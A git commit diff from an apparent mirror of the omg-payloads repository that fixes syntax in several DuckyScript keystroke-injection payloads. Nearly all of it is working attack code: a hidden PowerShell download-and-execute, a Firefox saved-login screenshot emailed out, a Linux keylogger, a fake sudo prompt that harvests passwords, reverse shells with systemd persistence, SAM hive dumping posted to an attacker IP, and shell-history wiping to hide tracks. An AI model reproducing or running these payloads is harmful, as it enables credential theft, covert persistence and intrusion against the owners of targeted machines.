mirror of https://github.com/hak5/omg-payloads.git
Fixing misc execution or formatting errors
There are many payloads in the repo that do not run due to compiler errors (mostly typos, but a few commands that do not exist on O.MG devices). Fixing those errors, along with implementing minor changes such as using STRINGLN in place of STRING and ENTER, or DEFAULT_DELAY in place of DELAY 200 on every other line for improved readability. No content of these scripts has been altered, and I do not intend to run them to validate that they work as intended on their target operating systems.syntaxFixes
parent
63ce12dd61
commit
4a0fdf22c3
|
@ -1,15 +1,18 @@
|
||||||
REM Title: Credz-Plz
|
REM_BLOCK
|
||||||
|
Title: Credz-Plz
|
||||||
|
Author: I am Jakoby
|
||||||
|
Target: Windows 10, 11
|
||||||
|
|
||||||
REM Author: I am Jakoby
|
Description: This payload is meant to prompt the target to enter their creds to later be ted with dropbox. See README.md file for more details.
|
||||||
|
|
||||||
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details.
|
Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
|
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
DEFINE #URL
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://#URL?dl=1; invoke-expression $pl
|
||||||
ENTER
|
|
||||||
|
|
||||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
|
||||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
|
|
@ -1,192 +1,92 @@
|
||||||
REM Title: Harvester_OF_SORROW
|
REM_BLOCK
|
||||||
REM Author: LulzAnarchyAnon
|
Title: Harvester_OF_SORROW
|
||||||
REM Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a
|
Author: LulzAnarchyAnon
|
||||||
REM pin, or password is required to export saved log in credentials.
|
Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a pin, or password is required to export saved log in credentials.
|
||||||
REM The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes
|
|
||||||
REM a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot
|
The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.
|
||||||
REM to an email of your choosing.
|
|
||||||
REM Target: Windows 10, PowerShell & Mozilla Firefox
|
Target: Windows 10, PowerShell & Mozilla Firefox
|
||||||
Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn
|
Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn
|
||||||
REM Version: 1.0
|
|
||||||
REM Category: Credentials (OMG)
|
|
||||||
|
|
||||||
|
Version: 1.0
|
||||||
|
Category: Credentials (OMG)
|
||||||
|
|
||||||
REM Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.
|
Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.
|
||||||
REM After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from
|
After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from the email screen shot.
|
||||||
REM the email screen shot.
|
|
||||||
|
|
||||||
|
You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
|
||||||
|
Can exfil more than 5, but I chose 5 to keep file sizes low.
|
||||||
|
Can exfil from directory other than screenshots by changing path.
|
||||||
|
You might have to adjust the delays, depending on the target machine, but these worked ok for me.
|
||||||
|
Use responsibly, and within the confines of the law.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #USER_EMAIL user@example.com
|
||||||
|
DEFINE #USER_PASSWORD supersecretpassword
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 200
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
STRINGLN firefox about:logins
|
||||||
STRING firefox about:logins
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
TAB
|
REPEAT 10 TAB
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
TAB
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
SHIFT SPACE
|
SHIFT SPACE
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
PRINTSCREEN
|
PRINTSCREEN
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
STRINGLN powershell -windowstyle hidden
|
||||||
STRING powershell -windowstyle hidden
|
|
||||||
ENTER
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
STRING mspaint
|
STRINGLN mspaint
|
||||||
ENTER
|
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
CTRL v
|
CTRL v
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
CTRL s
|
CTRL s
|
||||||
TAB
|
REPEAT 11 TAB
|
||||||
DELAY 300
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 100
|
|
||||||
RIGHTARROW
|
RIGHTARROW
|
||||||
DELAY 100
|
|
||||||
DOWNARROW
|
DOWNARROW
|
||||||
DELAY 100
|
REPEAT 2 RIGHTARROW
|
||||||
RIGHTARROW
|
|
||||||
DELAY 100
|
|
||||||
RIGHTARROW
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
TAB
|
||||||
DELAY 200
|
|
||||||
ENTER
|
ENTER
|
||||||
CTRL RIGHTARROW
|
REPEAT 2 CTRL RIGHTARROW
|
||||||
DELAY 100
|
REPEAT 13 TAB
|
||||||
CTRL RIGHTARROW
|
REPEAT 2 RIGHTARROW
|
||||||
DELAY 100
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
TAB
|
|
||||||
DELAY 200
|
|
||||||
RIGHTARROW
|
|
||||||
DELAY 200
|
|
||||||
RIGHTARROW
|
|
||||||
ENTER
|
ENTER
|
||||||
TAB
|
TAB
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
ALT f
|
ALT f
|
||||||
DELAY 50
|
|
||||||
ALT X
|
ALT X
|
||||||
DELAY 50
|
|
||||||
ALT f
|
ALT f
|
||||||
DELAY 50
|
|
||||||
X
|
X
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
REM ~~~~ You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
|
|
||||||
REM ~~~~ Can exfil more than 5, but I chose 5 to keep file sizes low.
|
|
||||||
REM ~~~~ Can exfil from directory other than screenshots by changing path on lines 18, 57, and 61.
|
|
||||||
REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.
|
|
||||||
REM ~~~~ Use responsibly, and within the confines of the law.
|
|
||||||
DELAY 2000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
|
||||||
REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots
|
REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots
|
||||||
STRING %USERPROFILE%\Pictures\Screenshots
|
STRINGLN %USERPROFILE%\Pictures\Screenshots
|
||||||
ENTER
|
|
||||||
DELAY 150
|
|
||||||
REM sorting the files by date
|
REM sorting the files by date
|
||||||
MENU
|
SHIFT F10
|
||||||
DELAY 150
|
|
||||||
STRING o
|
STRING o
|
||||||
DELAY 150
|
|
||||||
DOWNARROW
|
DOWNARROW
|
||||||
DELAY 150
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 150
|
|
||||||
REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays
|
REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays
|
||||||
SHIFT RIGHTARROW
|
REPEAT 4 SHIFT RIGHTARROW
|
||||||
SHIFT RIGHTARROW
|
|
||||||
SHIFT RIGHTARROW
|
|
||||||
SHIFT RIGHTARROW
|
|
||||||
DELAY 150
|
|
||||||
REM sending files to loot.zip
|
REM sending files to loot.zip
|
||||||
MENU
|
SHIFT F10
|
||||||
DELAY 150
|
|
||||||
STRING n
|
STRING n
|
||||||
DELAY 200
|
|
||||||
DOWNARROW
|
DOWNARROW
|
||||||
DELAY 150
|
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING loot
|
STRINGLN loot
|
||||||
ENTER
|
|
||||||
DELAY 150
|
|
||||||
ALT F4
|
ALT F4
|
||||||
DELAY 150
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 150
|
|
||||||
REM open powershell and send the email
|
REM open powershell and send the email
|
||||||
STRING powershell
|
STRINGLN powershell
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~
|
REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~
|
||||||
STRING Send-MailMessage -From user@example.com -To user@example.com -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList user@example.com, (ConvertTo-SecureString -String "supersecretpassword" -AsPlainText -Force))
|
STRINGLN Send-MailMessage -From #USER_EMAIL -To #USER_EMAIL -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #USER_EMAIL, (ConvertTo-SecureString -String "#USER_PASSWORD" -AsPlainText -Force))
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
REM cleanup
|
REM cleanup
|
||||||
STRING del Pictures\Screenshots\loot.zip
|
STRINGLN del Pictures\Screenshots\loot.zip
|
||||||
ENTER
|
STRINGLN exit
|
||||||
DELAY 150
|
|
||||||
STRING exit
|
|
||||||
ENTER
|
|
||||||
|
|
|
@ -1,93 +1,75 @@
|
||||||
REM Title: DuckyLogger
|
REM_BLOCK
|
||||||
REM Description: Key logger which sends each and every key stroke of target remotely/locally.
|
Title: DuckyLogger
|
||||||
REM AUTHOR: drapl0n
|
Description: Key logger which sends each and every key stroke of target remotely/locally.
|
||||||
REM Version: 1.0
|
AUTHOR: drapl0n
|
||||||
REM Category: Credentials
|
Version: 1.0
|
||||||
REM Target: Unix-like operating systems with systemd
|
Category: Credentials
|
||||||
REM Attackmodes: HID
|
Target: Unix-like operating systems with systemd
|
||||||
|
Attackmodes: HID
|
||||||
|
|
||||||
REM [Note]
|
Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
|
||||||
REM Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
|
END_REM
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
|
||||||
REM [keeping tracks clear]
|
REM [keeping tracks clear]
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
CTRL ALT t
|
CTRL ALT t
|
||||||
DELAY 400
|
DELAY 400
|
||||||
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [creating key logging mechanism]
|
REM [creating key logging mechanism]
|
||||||
STRING mkdir /var/tmp/.system
|
STRINGLN mkdir /var/tmp/.system
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
STRINGLN echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING chmod +x /var/tmp/.system/sys
|
STRINGLN chmod +x /var/tmp/.system/sys
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [importing xinput]
|
REM [importing xinput]
|
||||||
STRING cd /var/tmp/.system/
|
STRINGLN cd /var/tmp/.system/
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
|
STRINGLN wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
|
||||||
ENTER
|
|
||||||
DELAY 5000
|
DELAY 5000
|
||||||
STRING chmod +x xinput
|
STRINGLN chmod +x xinput
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [creating reverse shell]
|
REM [creating reverse shell]
|
||||||
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING chmod +x /var/tmp/.system/systemBus
|
STRINGLN chmod +x /var/tmp/.system/systemBus
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [creating systemd service to execute payload on boot]
|
REM [creating systemd service to execute payload on boot]
|
||||||
STRING mkdir -p ~/.config/systemd/user
|
STRINGLN mkdir -p ~/.config/systemd/user
|
||||||
ENTER
|
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
|
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
|
||||||
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING chmod +x /var/tmp/.system/reboot
|
STRINGLN chmod +x /var/tmp/.system/reboot
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [creating systemd service to execute payload on boot]
|
REM [creating systemd service to execute payload on boot]
|
||||||
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [enabling service]
|
REM [enabling service]
|
||||||
STRING systemctl --user daemon-reload
|
STRINGLN systemctl --user daemon-reload
|
||||||
ENTER
|
|
||||||
DELAY 300
|
DELAY 300
|
||||||
STRING systemctl --user enable --now systemBUS.service
|
STRINGLN systemctl --user enable --now systemBUS.service
|
||||||
ENTER
|
|
||||||
DELAY 150
|
DELAY 150
|
||||||
STRING systemctl --user start --now systemBUS.service
|
STRINGLN systemctl --user start --now systemBUS.service
|
||||||
ENTER
|
|
||||||
DELAY 150
|
DELAY 150
|
||||||
STRING systemctl --user enable --now reboot.service
|
STRINGLN systemctl --user enable --now reboot.service
|
||||||
ENTER
|
|
||||||
DELAY 150
|
DELAY 150
|
||||||
STRING systemctl --user start --now reboot.service
|
STRINGLN systemctl --user start --now reboot.service
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
|
|
||||||
REM [autostarting service on terminal/shell launch]
|
REM [autostarting service on terminal/shell launch]
|
||||||
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
STRINGLN echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
|
||||||
ENTER
|
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
||||||
ENTER
|
|
|
@ -1,33 +1,24 @@
|
||||||
REM Title: SamDumpCable
|
REM_BLOCK
|
||||||
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
|
Title: SamDumpCable
|
||||||
REM Author: 0iphor13
|
Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
|
||||||
REM Version: 1.0
|
Author: 0iphor13
|
||||||
REM Category: Credentials
|
Version: 1.0
|
||||||
REM Requirements: OMG Firmware v.2.5 or higher
|
Category: Credentials
|
||||||
|
Requirements: OMG Firmware v.2.5 or higher
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DEFINE #IPADDRESS 0.0.0.0
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
DUCKY_LANG de
|
DUCKY_LANG de
|
||||||
DELAY 500
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 500
|
||||||
DELAY 1500
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
STRING powershell Start-Process powershell -Verb runAs
|
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
|
|
||||||
REM Change this Change this shortcut depending on the systems language (engl.: ALT y)
|
REM Change this Change this shortcut depending on the systems language (engl.: ALT y)
|
||||||
ALT j
|
ALT j
|
||||||
DELAY 250
|
|
||||||
|
|
||||||
STRING powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQAzADMANwBPAE0ARwBzAGEAbQA7AHIAZQBnACAAcwBhAHYAZQAgAGgAawBsAG0AXABzAHkAcwB0AGUAbQAgADEAMwAzADcATwBNAEcAcwB5AHMAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAFAAVwBEAFwAMQAzADMANwBPAE0ARwBzAHkAcwAiACwAIAAiACQAUABXAEQAXAAxADMAMwA3AE8ATQBHAHMAYQBtACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAATwBNAEcAZAB1AG0AcAAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAMQAzADMANwBPAE0ARwBzAHkAcwA7AHIAZQBtAG8AdgBlAC0AaQB0AGUAbQAgADEAMwAzADcATwBNAEcAcwBhAG0AOwBlAHgAaQB0AA==
|
STRINGLN powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQAzADMANwBPAE0ARwBzAGEAbQA7AHIAZQBnACAAcwBhAHYAZQAgAGgAawBsAG0AXABzAHkAcwB0AGUAbQAgADEAMwAzADcATwBNAEcAcwB5AHMAOwBDAG8AbQBwAHIAZQBzAHMALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAIgAkAFAAVwBEAFwAMQAzADMANwBPAE0ARwBzAHkAcwAiACwAIAAiACQAUABXAEQAXAAxADMAMwA3AE8ATQBHAHMAYQBtACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAATwBNAEcAZAB1AG0AcAAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAMQAzADMANwBPAE0ARwBzAHkAcwA7AHIAZQBtAG8AdgBlAC0AaQB0AGUAbQAgADEAMwAzADcATwBNAEcAcwBhAG0AOwBlAHgAaQB0AA==
|
||||||
DELAY 200
|
|
||||||
ENTER
|
|
||||||
DELAY 200
|
|
||||||
|
|
||||||
REM Insert your recieving servers IP here ----------------------------------------------------------
|
REM Insert your recieving servers IP here ----------------------------------------------------------
|
||||||
STRING iwr "http://0.0.0.0" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
|
STRINGLN iwr "http://#IPADDRESS" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
|
||||||
DELAY 200
|
|
||||||
ENTER
|
|
||||||
|
|
|
@ -1,82 +1,51 @@
|
||||||
REM Title: sudoSnatch
|
REM_BLOCK
|
||||||
REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
|
Title: sudoSnatch
|
||||||
REM AUTHOR: drapl0n
|
Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
|
||||||
REM Version: 1.0
|
|
||||||
REM Category: Credentials
|
AUTHOR: drapl0n
|
||||||
REM Target: Unix-like operating systems with systemd
|
Version: 1.0
|
||||||
REM Attackmodes: HID
|
Category: Credentials
|
||||||
|
Target: Unix-like operating systems with systemd
|
||||||
|
Attackmodes: HID
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
DUCKY_LANG US
|
||||||
|
DELAY 2000
|
||||||
|
DEFAULT_DELAY 100
|
||||||
|
|
||||||
REM [keeping tracks clear]
|
REM [keeping tracks clear]
|
||||||
DELAY 5000
|
|
||||||
CTRL ALT t
|
CTRL ALT t
|
||||||
DELAY 400
|
DELAY 400
|
||||||
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
|
|
||||||
REM [creating password grabbing mechanism]
|
REM [creating password grabbing mechanism]
|
||||||
STRING mkdir /var/tmp/.system
|
STRINGLN mkdir /var/tmp/.system
|
||||||
ENTER
|
STRINGLN echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
|
||||||
DELAY 100
|
STRINGLN touch /var/tmp/.system/sysLog
|
||||||
STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
|
STRINGLN chmod +x /var/tmp/.system/systemMgr
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
STRING touch /var/tmp/.system/sysLog
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
STRING chmod +x /var/tmp/.system/systemMgr
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
|
|
||||||
REM [creating reverse shell]
|
REM [creating reverse shell]
|
||||||
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||||
ENTER
|
STRINGLN chmod +x /var/tmp/.system/systemBus
|
||||||
DELAY 100
|
|
||||||
STRING chmod +x /var/tmp/.system/systemBus
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
|
|
||||||
REM [creating systemd service to execute payload on boot]
|
REM [creating systemd service to execute payload on boot]
|
||||||
STRING mkdir -p ~/.config/systemd/user
|
STRINGLN mkdir -p ~/.config/systemd/user
|
||||||
ENTER
|
STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
||||||
DELAY 200
|
|
||||||
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
|
|
||||||
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
|
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
|
||||||
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
|
||||||
ENTER
|
STRINGLN chmod +x /var/tmp/.system/reboot
|
||||||
DELAY 100
|
|
||||||
STRING chmod +x /var/tmp/.system/reboot
|
|
||||||
ENTER
|
|
||||||
DELAY 100
|
|
||||||
|
|
||||||
REM [creating systemd service for reboot]
|
REM [creating systemd service for reboot]
|
||||||
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
|
